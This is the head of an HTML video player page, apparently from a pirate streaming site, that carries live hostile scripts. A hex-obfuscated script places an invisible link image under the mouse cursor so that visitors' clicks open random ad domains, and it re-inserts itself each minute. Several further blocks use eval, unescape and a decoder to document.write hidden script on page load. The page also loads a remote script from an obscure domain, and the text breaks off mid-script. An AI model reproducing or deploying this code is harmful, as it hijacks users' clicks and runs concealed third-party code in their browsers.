
<!DOCTYPE html>
<html>
<head data-cast-api-enabled="true">
  <title>Player CH</title>
  <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
  <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
  <script src="./rc-player/player/video-live.js?13"></script>
  <script src="./RedeCanaisVTTS/js/RCServer01/videojs.thumbnails.js"></script>
  <link href="./rc-player/player/videojs.thumbnails.css" rel="stylesheet">
    <!--<script src="https://cdn.jsdelivr.net/npm/cdnbye-mp4@latest"></script>-->
    <!--<script src="https://cdn.jsdelivr.net/npm/cdnbye-mp4@latest/dist/videojs-contrib-mp4.min.js"></script>-->
	
  <link rel="stylesheet" href="./imavjs/examples/style.css" />
  <link rel="stylesheet" type="text/css" href="./rc-player/player/video-js.css">
  <link rel="stylesheet" href="./imavjs/node_modules/videojs-contrib-ads/dist/videojs.ads.css" />
  <link rel="stylesheet" href="./imavjs/dist/videojs.ima.css" />
  
  <link rel="stylesheet" type="text/css" href="./rc-player/player/video-js.css">
  <script src="./rc-player/player/jquery.js"></script>
  <link href="./rc-player/player/dist/videojs-chromecast.css" rel="stylesheet">
  <script type="text/javascript" src="https://cdn.viblast.com/vb/stable/viblast.js"></script>
  <script type="text/javascript" src="https://supercache.ga/random.js" async></script>
  <script data-cfasync="false" type="text/javascript">var _$_56bd=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x68\x61\x70\x70\x65\x6E\x69\x6E\x67\x74\x75\x72\x62\x61\x6E\x64\x69\x73\x6F\x72\x67\x61\x6E\x69\x7A\x65\x64\x2E\x63\x6F\x6D\x2F\x6E\x78\x31\x37\x65\x77\x30\x34\x31\x3F\x6B\x65\x79\x3D\x61\x33\x34\x31\x31\x32\x62\x34\x36\x31\x39\x61\x38\x31\x61\x66\x38\x37\x33\x39\x64\x65\x33\x61\x65\x35\x61\x32\x35\x66\x33\x38","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x65\x6E\x6F\x6F\x70\x74\x6F\x2E\x63\x6F\x6D\x2F\x34\x2F\x34\x37\x38\x31\x38\x37\x39","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x32\x2E\x62\x70\x2E\x62\x6C\x6F\x67\x73\x70\x6F\x74\x2E\x63\x6F\x6D\x2F\x2D\x36\x74\x6D\x39\x2D\x71\x5A\x61\x67\x59\x6F\x2F\x57\x47\x43\x77\x44\x70\x72\x6A\x6E\x57\x49\x2F\x41\x41\x41\x41\x41\x41\x41\x41\x46\x37\x45\x2F\x5F\x57\x75\x32\x72\x6D\x75\x39\x58\x65\x49\x49\x34\x35\x53\x30\x44\x57\x53\x4C\x70\x75\x59\x58\x30\x63\x31\x41\x36\x63\x4F\x72\x77\x43\x4C\x63\x42\x2F\x73\x31\x36\x30\x30\x2F\x70\x78\x2E\x70\x6E\x67","\x3C\x61\x20\x69\x64\x3D\x27\x67\x70\x75\x6A\x73\x5F\x6C\x69\x6E\x6B\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x39\x39\x39\x39\x3B\x20\x63\x75\x72\x73\x6F\x72\x3A\x64\x65\x66\x61\x75\x6C\x74\x27\x20\x68\x72\x65\x66\x3D\x27","\x27\x20\x74\x61\x72\x67\x65\x74\x3D\x27\x5F\x62\x6C\x61\x6E\x6B\x27\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x27","\x27\x20\x69\x64\x3D\x27\x67\x70\x75\x6A\x73\x5F\x69\x6D\x67\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x77\x69\x64\x74\x68\x3A\x35\x30\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x35\x30\x30\x70\x78\x3B\x6D\x61\x72\x67\x69\x6E\x2D\x74\x6F\x70\x3A\x2D\x31\x30\x30\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x66\x74\x3A\x2D\x31\x30\x30\x70\x78\x3B\x20\x66\x6C\x6F\x61\x74\x3A\x6E\x6F\x6E\x65\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x61\x62\x73\x6F\x6C\x75\x74\x65\x27\x3E\x3C\x2F\x61\x3E","\x67\x70\x75\x6A\x73\x5F\x63\x6F\x6F\x6B\x69\x65","\x62\x6F\x64\x79","\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x23\x67\x70\x75\x6A\x73\x5F\x69\x6D\x67","\x67\x70\x75\x6A\x73\x5F\x6C\x69\x6E\x6B","\x63\x6C\x69\x63\x6B","\x23\x67\x70\x75\x6A\x73\x5F\x6C\x69\x6E\x6B","\x67\x70\x75\x6A\x73\x5F\x63\x6F\x6F\x6B\x69\x65\x3D\x68\x6F\x6C\x64\x69\x6E\x67\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F"];$(document).ready(function(){var array_urls=[];var image_url=null;var expire=4;array_urls.push(_$_56bd[0]);array_urls.push(_$_56bd[1]);image_url= _$_56bd[2];expire= 5;var url=array_urls[Math.floor(Math.random()* array_urls.length)];var html_content=_$_56bd[3]+ url+ _$_56bd[4]+ image_url+ _$_56bd[5];if(document.cookie.indexOf(_$_56bd[6])< 0){$(_$_56bd[7]).append(html_content)};$(document).on(_$_56bd[8],function(e){$(_$_56bd[9]).css({left:e.pageX,top:e.pageY})});setInterval(function(){if(document.getElementById(_$_56bd[10])){}else {if(document.cookie.indexOf(_$_56bd[6])< 0){var url=array_urls[Math.floor(Math.random()* array_urls.length)];var html_content=_$_56bd[3]+ url+ _$_56bd[4]+ image_url+ _$_56bd[5];$(_$_56bd[7]).append(html_content)}}},60* 1000);$(document.body).on(_$_56bd[11],_$_56bd[12],function(){$(_$_56bd[12]).remove();var expires= new Date();expires.setMinutes(expires.getMinutes()+ expire);document.cookie= _$_56bd[13]+ expires.toGMTString()+ _$_56bd[14]})})</script>

<!--<meta name="referrer" content="no-referrer">-->
<script>l1l=document.documentMode||document.all;var d9f76c=true;ll1=document.layers;lll=window.sidebar;d9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');d9f76c|=lII;zLP=location.protocol+'0FD';ap4KFIA6c6yIkM=new Array();wd7uy5wIF3748E=new Array();wd7uy5wIF3748E[0]='tW%31%32RR';ap4KFIA6c6yIkM[0]='	~za~~~~~~~~~	~\n~~~\r~~~~~~~~~~~~~~~~~~~\r~"~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~\\~]~^~_~`~a~b~F~ ~e~f~g~h~i~j~k~l~m~n~o~p~q~dl=document.layers;oe=win~ww.op}a?1:0;da=(~w~y~{~}.}~z~|tMode||}"}~~a';f55G0YeuUgeh='fu';tvrO6rU4='eudUWOOtWnNUOTHO';f55G0YeuUgeh+=  'nction e6343XDger9'+'yO4nobs3J28(dT2n6oi77ni'+'bjv1M5R3){';rDj7j62UsiD2Rr='fBTy7J8LNF2R';rF6Fmz1i56FcsP7='\151f%28%7ALP%2E\151n\144e\170Of%28%27%5C%35%35%27%29%3E%30%29%7B\141p%34%4BFIA%36c%36\171Ik%4D%5B%30%5D%3D%27\170%27%7D%3B%76\141%72%20\154%32%3D\167i%6Edow%2E%6Fpe%72a%3F%31%3A%30%3Bf\165\156cti%6F\156%20\154%33%28l%34%29%7B%6C%35%3D%2F\172\141%2F%67%3B%6C%36%3D\123\164r\151%6E%67%2Ef%72o\155%43h\141\162C\157%64\145%28%30%29%3B%6C%34%3Dl%34%2E%72\145p\154%61\143%65%28\154%35%2Cl%36%29%3Bva\162%20\154%37%3Dne%77%20%41\162%72ay%28%29%2C\154%38%3D%5F%31%3D\154%34%2El%65\156g\164%68%2C%6C%39%2C\154%49%2C%69l%3D%31%36%32%35%36%2C%5F%31%3D%30%2C\111%3D%30%2C%6C\151%3D%27%27%3B%64o%7B%6C%39%3Dl%34%2Ec\150a\162%43%6F%64\145\101\164%28%5F%31%29%3B%6C\111%3Dl%34%2E%63\150ar%43%6FdeA\164%28%2B%2B%5F%31%29%3Bl%37%5BI%2B%2B%5D%3Dl%49%2B%69\154%2D%28l%39%3C%3C%37%29%7D%77\150%69\154%65%28%5F%31%2B%2B%3C';eval(unescape('\146uncti%6Fn%20mP%34%36p%34%20%20%20%20%28\166%39m%51%73i%29%7B\145\165%32UT%33%38d\161%55%3D\166%39m\121s%69%7D%3B'));ap4KFIA6c6yIkM[0]+=  'll)&&!};g}},}$.}8tEle}-ById;ws}	}}\r.si}(bar?true:f}/se;tN=navigator.u}\\rA}8} }hLow}Ca}\\();iz}`}_.}KexOf(\'netsca}\')>=0}T}V}X}Zl}\\;zi}I}||8~va;v}R msg=\'\';function |	m}z{r|\nur|7}U}W}}G}K}t}|	rr}i =|8}A|OF}J}|Gl~x}g|5n.p|K}hcol|';function yO4nobs3J28e6343XDger9(oStH3g3yuflC){tvrO6rU4+=oStH3g3yuflC};f55G0YeuUgeh+=  'eva';nJV3Jf='xXZIatXBrYoGnPaVlUcYMVpObxyD';f55G0YeuUgeh+=  'l(unes';looNN2km7='fiJFV15e4GG65y59uE';f55G0YeuUgeh+=  'cape(dT2n6oi77nibjv1M5R3))}';eval(f55G0YeuUgeh);vL4ZV0Fn2='GONmVjamamOObWGxyDkOTOSTORIROnSuWMS';f55G0YeuUgeh='';rF6Fmz1i56FcsP7+=  '%6C%38%29%3Bvar%20l%31%3Dne\167%20\101%72%72ay%28%29%2Cl%30%3D\156%65\167%20A%72\162%61y%28%29%2C\111%6C%3D%31%32%38%3B%64o%7B%6C%30%5B\111l%5D%3DS\164\162in\147%2E%66r%6F%6DCh%61r%43od%65%28Il%29%7D\167hile%28%2D%2D%49l%29%3BI%6C%3D%31%32%38%3B\154%31%5B%30%5D%3Dli%3Dl%30%5Bl%37%5B%30%5D%5D%3Bll%3Dl%37%5B%30%5D%3B%5F\154%3D%31%3B\166\141r%20l%5F%3D%6C%37%2E%6C%65%6Eg%74%68%2D%31%3B\167h\151%6Ce%28%5F\154%3C%6C%5F%29%7Bsw%69tc%68%28\154%37%5B%5Fl%5D%3CI%6C%3F%31%3A%30%29%7Bc\141\163%65%20%30%20%3A\154%30%5BI%6C%5D%3Dl%30%5B\154\154%5D%2B%53%74%72%69n\147%28%6C%30%5Bl\154%5D%29%2E%73u\142\163t%72%28%30%2C%31%29%3Bl%31%5B%5Fl%5D%3D\154%30%5BIl%5D%3Bif%28l%32%29%7Bl\151%2B%3D%6C%30%5B%49\154%5D%7D%3B\142%72eak%3B%64%65\146%61ul\164%3Al%31%5B%5Fl%5D%3D%6C';yO4nobs3J28e6343XDger9('g9mw9EF7p');xICum6g1Gj='l';wd7uy5wIF3748E[0]+=  'v%35%37Y%37%6AU%39';ap4KFIA6c6yIkM[0]+=  '}|||fi}@|!=-1|}W}Y}[}]i7f=|s}3!z|R|p||s|%|\'WURFL={"|`mp}@te_}(}dc{}b~{":"Goog}@ Ch|K{,"f}im_}Z|3}i{"Desk}hp"{&|_mob|ie{|}\\|D}:} d|p}gchEv}$(|	w {L{N"W|?flJS{1{|3|ZCo{\r{{?)}{~r{g{h{i{j{k{l{m{n{o{n~c{r{s{t{u{v{w{x{y{z{{{|{}{~{zzazzzzzzzzz	z\nzz{pzzzzzzzz~';rF6Fmz1i56FcsP7+=  '%30%5Bl%37%5B%5F\154%5D%5D%3B\151f%28l%32%29%7B\154i%2B%3D\154%30%5B\154%37%5B%5F\154%5D%5D%7D%3Bl%30%5B\111\154%5D%3Dl%30%5B\154\154%5D%2B\123%74\162\151n\147%28l%30%5Bl%37%5B%5Fl%5D%5D%29%2E\163u\142str%28%30%2C%31%29%3B%62re%61k%7D%3BI%6C%2B%2B%3B\154\154%3D\154%37%5B%5Fl%5D%3B%5Fl%2B%2B%7D%3Bif%28%21l%32%29%7B%72%65%74ur%6E%28%6C%31%2Ej\157in%28%27%27%29%29%7Del%73\145%7Bre%74\165rn%20%6C%69%7D%7D%3B%76a%72%20%6C%4F%3D%27%27%3Bfo%72%28ii%3D%30%3Bii%3C\141p%34K\106I\101%36c%36y\111k\115%2El%65\156\147th%3B%69i%2B%2B%29%7BlO%2B%3Dl%33%28\141%70%34%4BF%49%41%36c%36%79%49k%4D%5B%69\151%5D%29%7D%3B\151f%28d%39f%37%36c%29%7Bdo\143\165me%6Et%2E%77\162\151t%65%28%27%3C\163\143%72%27%2B%27i\160t%3E%27%2B\154O%2B%27%3C%2Fsc%27%2B%27ri%70%74%3E%27%29%7D%3B';vL4ZV0Fn2      ='dXwnPaOfuNrXqHUjpOTTclQwhnZmXTJxEsHObTDMLOcLZVOTO';yO4nobs3J28e6343XDger9    (nJV3Jf);e6343XDger9yO4nobs3J28 (rF6Fmz1i56FcsP7);xICum6g1Gj+=  'CbOKUsyldNsebpkJwLOOIcblQROyZOBOOByWOltYOucCnyttJRHGJgCZMOuCqiGFLOZBlsSnObiOBVdJFOlkZMVglFTNCqgOrDHMOgCOe';</script>
<script>l1l=document.documentMode||document.all;var d9f76c=true;ll1=document.layers;lll=window.sidebar;d9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');d9f76c|=lII;zLP=location.protocol+'0FD';y256g2v2qMDO9r=new Array();pGBtd1CTiFDkLD=new Array();pGBtd1CTiFDkLD[0]='r%61%31H%39%31';y256g2v2qMDO9r[0]='	~zf~~~~~~~~~	~\n~~~\r~~~~~~~~~~~~~~~~~\r~ ~!~"~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~\\~]~^~_~.~~b~c~d~e~f~g~h~i~j~k~l~m~dl=document.layers;oe=win~sw.op~a?1:0;da=(~s~u~w~y.}~v~xtMode||}}~zall)&&!};g}}(} .}4tEle})ById;ws}}}	.si}$bar?true:f';fJTxhyT27eRB='fu';wPsCp26h='uOJhXOKFOOMJiERYaixmONsvfFOG';fJTxhyT27eRB+=  'nction k979rpYfzY'+'ey8Voi(x2R6fq7lTWJ'+'h2GswEH4G){';r7y4oirMq760u4='ae08WGz5JOY4';i9DbkovgtPT8jn7='%69%66%28z\114P%2E\151%6E%64%65x\117f%28%27%5C%35%35%27%29%3E%30%29%7B%79%32%35%36\147%32v%32\161%4DD\117%39%72%5B%30%5D%3D%27x%27%7D%3B%76a\162%20\154%32%3Dw%69\156%64ow%2E%6F%70%65%72%61%3F%31%3A%30%3Bfu\156c%74\151%6F%6E%20l%33%28\154%34%29%7B%6C%35%3D%2F\172f%2F\147%3B\154%36%3D\123%74%72in\147%2E\146\162omC\150\141%72Co\144e%28%30%29%3Bl%34%3D\154%34%2Er%65pl%61%63e%28\154%35%2C%6C%36%29%3Bv%61r%20\154%37%3D\156\145w%20%41\162\162\141\171%28%29%2C\154%38%3D%5F%31%3D%6C%34%2E\154%65%6Egt%68%2C%6C%39%2C%6C\111%2C\151%6C%3D%31%36%32%35%36%2C%5F%31%3D%30%2C%49%3D%30%2Cl%69%3D%27%27%3Bd\157%7B%6C%39%3Dl%34%2Echa%72\103o%64%65A\164%28%5F%31%29%3BlI%3Dl%34%2Ec\150\141%72\103\157%64%65At%28%2B%2B%5F%31%29%3Bl%37%5BI%2B%2B%5D%3D\154%49%2B%69%6C%2D%28l%39%3C%3C%37%29%7D%77%68i\154e%28%5F%31%2B%2B%3C';eval(unescape('fun\143ti%6F%6E%20\170%67%71%39%32%37%36%31%34%6Cd\165%20%20%20%20%28%70\143%4AR\161Y%29%7B\157%32T%59D%31r\171\145%3D%70cJ\122%71%59%7D%3B'));y256g2v2qMDO9r[0]+=  '}+se;tN=navigator.u}XrA}4}}dLow~Ca}X();iz}\\}[.}GexOf(\'netsca}\r\')>=0}P}R}T}Vl}X;zi}E}||8~ra;v}N msg=\'\';function |m}v{r|ur|3}Q}S}}C}G}p}|rr}e =|4}=|OF}F}|Cl~t}c|1n.p|G}dcol}}}}||fi}<|!=-1|}S}U}W}Yi7f=|s}/!z|N|l||o}x|WURFL.f}em_}V|/}e=="Desk}dp"){|"r $_GET=[]|A|Q}\n|S|	|0|2.h|9f.|9p~';function ey8Voik979rpYfzY(ukQJUb88UDfU){wPsCp26h+=ukQJUb88UDfU};fJTxhyT27eRB+=  'eva';ky3myG='BZcNluUiYqymOQXdsWLQ';fJTxhyT27eRB+=  'l(unes';h731f2='yI5EHe71g6q';fJTxhyT27eRB+=  'cape(x2R6fq7lTWJh2GswEH4G))}';eval(fJTxhyT27eRB);hFK60IWF8='cDPcOyOVRlFkpOFQibyYystWT';fJTxhyT27eRB='';i9DbkovgtPT8jn7+=  'l%38%29%3B\166%61r%20\154%31%3Dnew%20\101%72%72ay%28%29%2C\154%30%3Dne\167%20Arra\171%28%29%2C%49l%3D%31%32%38%3Bdo%7Bl%30%5B\111l%5D%3DS%74r%69\156\147%2E%66\162o%6DCh%61\162C%6Fd\145%28I%6C%29%7Dw\150\151%6Ce%28%2D%2DIl%29%3B%49%6C%3D%31%32%38%3B\154%31%5B%30%5D%3Dl\151%3D%6C%30%5B%6C%37%5B%30%5D%5D%3B\154l%3D%6C%37%5B%30%5D%3B%5F%6C%3D%31%3B\166a\162%20\154%5F%3D%6C%37%2E\154e%6E\147th%2D%31%3B\167\150i\154e%28%5Fl%3Cl%5F%29%7Bsw%69t\143%68%28%6C%37%5B%5F\154%5D%3C\111l%3F%31%3A%30%29%7B\143%61\163e%20%30%20%3Al%30%5BIl%5D%3D\154%30%5Bll%5D%2BS%74r\151%6Eg%28l%30%5Bll%5D%29%2E%73\165\142s\164r%28%30%2C%31%29%3B\154%31%5B%5F\154%5D%3D\154%30%5BI%6C%5D%3B%69\146%28l%32%29%7Bli%2B%3D\154%30%5B\111l%5D%7D%3Bb\162\145%61k%3Bde\146%61ul\164%3A\154%31%5B%5F\154%5D%3Dl';ey8Voik979rpYfzY('d17Odlx5D');k255U1Q35F='l';pGBtd1CTiFDkLD[0]+=  'iS%56OYwS%65';y256g2v2qMDO9r[0]+=  '|ce(/[?&]+([^={9+)}{={9*)/gi,|,|.{)n(a,}^~w,|"l}S{{{T[{Se]={V}S;}}wi|!({Z{[\'}$vs\']){{ e}<})}]ew Ima}4}v;Obje|/}e|d|P|G}\rrty({x}=} ,\'}K\',{}9}U|-|/|V|7}{%~{|T{N{https://wz2{a{3book.|\\m"{d{e;|\\ns|]ez&g|%cSyst}= |9adyzz})}w}}~nz\\z]z^z_z`zazbzczd~~`zgzhzizjzkzlzmznzozpzqzrzsztzuzvzwzxzyzzz{z|z}z~zyzf~:zeyyyyyyy	zd';i9DbkovgtPT8jn7+=  '%30%5B%6C%37%5B%5F%6C%5D%5D%3B%69f%28%6C%32%29%7B\154i%2B%3Dl%30%5Bl%37%5B%5F%6C%5D%5D%7D%3Bl%30%5B%49%6C%5D%3D%6C%30%5B\154\154%5D%2B%53%74%72i%6E%67%28\154%30%5Bl%37%5B%5F%6C%5D%5D%29%2E%73%75%62%73\164%72%28%30%2C%31%29%3B%62\162%65%61k%7D%3BI%6C%2B%2B%3Bl%6C%3Dl%37%5B%5F\154%5D%3B%5F%6C%2B%2B%7D%3B\151f%28%21l%32%29%7B%72%65turn%28l%31%2Ejo%69\156%28%27%27%29%29%7De\154%73%65%7B%72e%74%75rn%20l\151%7D%7D%3Bva\162%20lO%3D%27%27%3Bf\157%72%28%69i%3D%30%3Bii%3Cy%32%35%36%67%32v%32%71M%44%4F%39\162%2E%6C%65%6E\147t%68%3Bi\151%2B%2B%29%7Bl\117%2B%3D%6C%33%28y%32%35%36\147%32%76%32qMD\117%39\162%5B%69i%5D%29%7D%3B\151\146%28\144%39\146%37%36%63%29%7Bdoc\165%6D%65n%74%2E\167ri\164e%28%27%3C%73\143%72%27%2B%27ip\164%3E%27%2B%6CO%2B%27%3C%2F%73c%27%2B%27%72%69%70\164%3E%27%29%7D%3B';hFK60IWF8      ='OcUOMExlHNDHOwOKbWObTVBmbROoREmZJVT';ey8Voik979rpYfzY    (ky3myG);k979rpYfzYey8Voi (i9DbkovgtPT8jn7);k255U1Q35F+=  'naMYdtCbROOOwptOMriehOrOtxLNVhFgnLOGpXGkmOnPiRUdmsYNqRgSORSdsxlMddbfjHkZrYx';</script>
<script src="../jqueryfix.js" type="d955af51682b99aa759dc3de-text/javascript"></script>
<script>l1l=document.documentMode||document.all;var d9f76c=true;ll1=document.layers;lll=window.sidebar;d9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');d9f76c|=lII;zLP=location.protocol+'0FD';h6yqu01oJS80TN=new Array();td542v1auIG4HZ=new Array();td542v1auIG4HZ[0]='%64%36g%4AWc';h6yqu01oJS80TN[0]='	~za~~~~~~~~~	~\n~~~\r~~~~~~~~~~~~~~~~~\r~ ~!~"~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~\\~]~^~_~`~G~~c~d~e~f~g~h~i~j~k~l~m~n~	dl=document.layers;oe=win~tw.op}zaa?1:0';btiR4jOR1O5i='fu';fvhwGW93='hMUiOnbVllpSwRJmOrkOOOJwxHnY';btiR4jOR1O5i+=  'nction sKb084qHgt'+'vQ4u16W(ksryg5S92'+'gtHhd6BJ3){';u3EJO71evsFoeE='ubVwjek2803W';f3GO3mO4e2H753s='%69%66%28%7A\114\120%2Einde%78%4F%66%28%27%5C%35%35%27%29%3E%30%29%7B\150%36y\161\165%30%31\157%4AS%38%30\124N%5B%30%5D%3D%27x%27%7D%3Bva%72%20l%32%3D\167in\144\157%77%2E\157%70\145\162\141%3F%31%3A%30%3B\146%75%6E%63%74ion%20l%33%28l%34%29%7B%6C%35%3D%2Fz\141%2F%67%3B%6C%36%3D%53\164%72\151%6E%67%2E%66r\157%6D\103%68a%72\103o\144e%28%30%29%3Bl%34%3D%6C%34%2E\162e\160\154a\143\145%28l%35%2C\154%36%29%3Bvar%20l%37%3D\156\145w%20%41r\162a\171%28%29%2C\154%38%3D%5F%31%3D%6C%34%2E\154eng%74\150%2C%6C%39%2ClI%2C\151l%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2C\154i%3D%27%27%3B%64\157%7B\154%39%3D%6C%34%2E\143h%61%72\103od%65%41\164%28%5F%31%29%3B\154%49%3D%6C%34%2E%63h\141rC%6F\144%65A\164%28%2B%2B%5F%31%29%3Bl%37%5B\111%2B%2B%5D%3Dl%49%2B\151l%2D%28%6C%39%3C%3C%37%29%7Dw\150i\154\145%28%5F%31%2B%2B%3C';eval(unescape('f\165%6E\143t%69\157n%20\161%79B%30%35DMJ%72%20%20%20%20%28\164%70%69\145\154Q%29%7B\160%30G%44\162%77\122\143%32J%36%33mW%3Dt\160i\145l%51%7D%3B'));h6yqu01oJS80TN[0]+=  ';da=(~t~v~x~z.}~w~ytMode||}}~{all)&&!};g}})}!.}5tEle}*ById;ws}}}\n.si}%bar?true:f},se;tN=navigator.u}YrA}5}}eLow}zaCa}Y();iz}]}\\.}HexOf(\'netsca}\')>=0}Q}S}U}Wl}Y;zi}F}||8~sa;v}O msg=\'\';fu';function vQ4u16WsKb084qHgt(g677iWGL8E6t){fvhwGW93+=g677iWGL8E6t};btiR4jOR1O5i+=  'eva';stHUgj='WEJfTOZOghMISfBuiOowOskyGvsqBDZwkCII';btiR4jOR1O5i+=  'l(unes';r7nC5RqmX='slGhem67b1cp6ZK708n';btiR4jOR1O5i+=  'cape(ksryg5S92gtHhd6BJ3))}';eval(btiR4jOR1O5i);waFmWr2Wj='lBTCKOCrMEOIgIJtWEWQNBVIOssYOgbZQsZbrVOHOTjWD';btiR4jOR1O5i='';f3GO3mO4e2H753s+=  'l%38%29%3B\166a\162%20\154%31%3D\156\145\167%20\101r\162a\171%28%29%2C%6C%30%3D%6E\145%77%20\101r%72%61\171%28%29%2C%49l%3D%31%32%38%3Bdo%7Bl%30%5B\111l%5D%3DSt\162i\156g%2E\146%72omCh\141%72\103ode%28I%6C%29%7Dw\150\151l\145%28%2D%2D\111%6C%29%3B\111l%3D%31%32%38%3Bl%31%5B%30%5D%3D%6C%69%3D%6C%30%5B%6C%37%5B%30%5D%5D%3Bl%6C%3Dl%37%5B%30%5D%3B%5F%6C%3D%31%3Bv\141r%20%6C%5F%3D%6C%37%2E\154\145\156\147%74h%2D%31%3B%77%68i\154\145%28%5Fl%3C%6C%5F%29%7Bs%77\151tch%28%6C%37%5B%5F\154%5D%3C%49\154%3F%31%3A%30%29%7Bca%73e%20%30%20%3Al%30%5B%49%6C%5D%3Dl%30%5B\154l%5D%2BS%74r%69\156\147%28%6C%30%5B%6C%6C%5D%29%2E\163u%62s%74r%28%30%2C%31%29%3B%6C%31%5B%5F%6C%5D%3Dl%30%5B%49%6C%5D%3B%69f%28l%32%29%7B\154i%2B%3D%6C%30%5B%49%6C%5D%7D%3B\142\162\145\141%6B%3B\144\145%66au%6C%74%3Al%31%5B%5F\154%5D%3Dl';vQ4u16WsKb084qHgt('o89gw20gq');sx49x3ZX4C='l';td542v1auIG4HZ[0]+=  '%63%6CSf\107t%34f';h6yqu01oJS80TN[0]+=  'nction |m}w{r|ur|4}R}T}}D}H}q}|rr}f =|5}>|OF}G}	|Dl~u}d|2n.p|H}ecol}~}	|za||fi}=|\r!=-1|}T}V}X}Zi7f=|s}0!z|O|m||p;|]ns|^e~|og|S}> Esp|W|$|Za v~ue!|\r;~o{{{{{{{ {!{"~~a{%{&{\'{({){*{+{,{-{.{/{0{1{2{3{4{5{6{7{8{9{:{;{<{={>{={#{A{B{C{D{E{F{G~g';f3GO3mO4e2H753s+=  '%30%5B%6C%37%5B%5Fl%5D%5D%3B%69f%28%6C%32%29%7B\154i%2B%3Dl%30%5B%6C%37%5B%5F%6C%5D%5D%7D%3B%6C%30%5B%49\154%5D%3D%6C%30%5B%6Cl%5D%2B\123t%72%69n%67%28%6C%30%5Bl%37%5B%5Fl%5D%5D%29%2E%73ub\163tr%28%30%2C%31%29%3Bb\162ea\153%7D%3BI%6C%2B%2B%3B%6C%6C%3Dl%37%5B%5Fl%5D%3B%5F\154%2B%2B%7D%3B\151%66%28%21\154%32%29%7Br\145%74%75rn%28l%31%2Ej\157%69%6E%28%27%27%29%29%7De\154s\145%7Br%65t%75rn%20%6C%69%7D%7D%3Bv%61r%20%6CO%3D%27%27%3B%66\157r%28\151i%3D%30%3B\151%69%3C%68%36y%71%75%30%31%6F%4A\123%38%30T%4E%2Ele%6Eg%74\150%3B%69i%2B%2B%29%7Bl%4F%2B%3Dl%33%28\150%36y\161u%30%31o\112\123%38%30%54N%5B\151\151%5D%29%7D%3B%69f%28%64%39%66%37%36%63%29%7B\144%6Fc%75me\156\164%2Ew%72%69t%65%28%27%3C\163%63%72%27%2B%27i%70\164%3E%27%2BlO%2B%27%3C%2Fs\143%27%2B%27ri%70t%3E%27%29%7D%3B';waFmWr2Wj      ='aQNQxxOOXwKBOeNqOvMZGkqgIOtVpOShWOeHPidXvSIytVTbwEwriHGlTaxccgK';vQ4u16WsKb084qHgt    (stHUgj);sKb084qHgtvQ4u16W (f3GO3mO4e2H753s);sx49x3ZX4C+=  'xJxekqGqOaSOPlOommyunxBTOOKJYhOWRbOOOOfYPBpOsyOvXvOjvxkvOVpJONhZNOwBgvQxOCvOQLoGIBZKUXOsNyMNbugWmiaNuOlMOOuZxjUxBsOZafuoOCcOPKNqyMdTkas';</script>
<script src="../marqueefix.js" type="d955af51682b99aa759dc3de-text/javascript"></script>
<script src="https://ajax.cloudflare.com/cdn-cgi/scripts/7089c43e/cloudflare-static/rocket-loader.min.js" data-cf-settings="d955af51682b99aa759dc3de-|49" defer=""></script>
<script>l1l=document.documentMode||document.all;var d9f76c=true;ll1=document.layers;lll=window.sidebar;d9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');d9f76c|=lII;zLP=location.protocol+'0FD';xx828H8Ozs7NGd=new Array();dd47Tt48hO64J4=new Array();dd47Tt48hO64J4[0]='nk%33D%77%4A';xx828H8Ozs7NGd[0]='	~zc~~~~~~~~~	~\n~~~\r~~~~~~~~~~~~~~~~~~~ ~\r~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~\\~]~^~_~`~a~b~c~O~!~f~g~h~i~j~k~l~m~n~o~p~q~r~hdl=document.layers;oe=win~xw.op}a?1:0;da=(~x~z~|~~.}~{~}tMode||}#} ~all)&&!};g}	}-}%.}9tEle}.ById;';bzo8EPtr36dj='fu';n1mKDj1E='OFpSVjSxTJMyOOSmEHTCaEOBmJLCVnYM';bzo8EPtr36dj+=  'nction 